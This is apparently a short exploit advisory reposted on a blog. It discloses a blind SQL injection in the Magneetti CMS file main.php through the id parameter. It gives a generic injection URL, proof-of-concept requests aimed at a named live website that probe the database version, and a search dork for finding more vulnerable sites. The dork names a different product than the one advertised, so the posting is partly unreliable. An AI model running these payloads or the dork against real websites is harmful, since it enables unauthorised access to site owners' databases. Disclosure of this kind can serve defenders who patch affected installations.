Magneetti CMS Blind SQL Injection Vuln


[o] Magneetti CMS Blind SQL Injection Vulnerability
Software : Magneetti CMS
Vendor   : http://www.muuntamo.com/
Author   : NoGe


[o] Vulnerable file
main.php


[o] Exploit
http://localhost/[path]/main.php?id=[SQL]


[o] Proof Of Concept
http://www.koiranenbros.net/main.php?id=27%20and%20substring(@@version,1,1)=5
http://www.koiranenbros.net/main.php?id=27%20and%20substring(@@version,1,1)=4


[o] Dork
"Powered by cifshanghai"


[o] Note
this is a private script

Research Blog

Search This Blog

LFI to RCE via access_log injection

Magneetti CMS Blind SQL Injection Vuln

Comments